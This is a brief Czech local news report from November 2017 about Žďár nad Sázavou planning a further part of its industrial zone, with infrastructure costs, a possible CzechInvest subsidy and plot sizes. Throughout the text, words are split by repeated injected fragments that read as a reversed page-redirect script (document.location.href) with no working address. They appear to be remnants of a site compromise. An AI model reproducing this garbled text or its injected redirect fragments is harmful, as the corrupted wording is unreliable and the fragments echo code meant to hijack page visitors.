Rainbow page separator

Žďár se hodlá pustit do přípravy další části průmyslové zóny

Čtvrtek, 16. listopadu 2017

Žďár nad Sázavou / S přípravou další části průmyslové zóny počítá žďárská radnice. V současné době už nemá výhledovým inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torům co nabídnout. Náklady na vybudování inženýrských sítí mezi ulicemi Jamská a Novoměstská jsou přibližně 120 milionů korun.
„Máme studii, která hovoří o asi 120 milionech na vybudování infrastruktury, což není málo, nicméně máme šanci uspět při spolupráci s agenturou CzechInvest, kde by bylo možné dosáhnout na dotaci do výše pětasedmdesát procent,“ sdělil starosta Žďáru nad Sázavou Zdeněk Navrátil.
V příštím roce začne Žďár připravovat projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovou dokumentaci a zároveň hodlá dokončit některé majetkoprávní záleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti, neboť ne všechny pozemky v lokalitě patří městu.
Připravené parcely v další části průmyslové zóny, které by mohly být nabídnuty inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torům, jsou o celkové výměře 175 tisíc metrů čtverečních, včetně ploch pro infrastrukturu se jedná o 220 tisíc metrů čtverečních.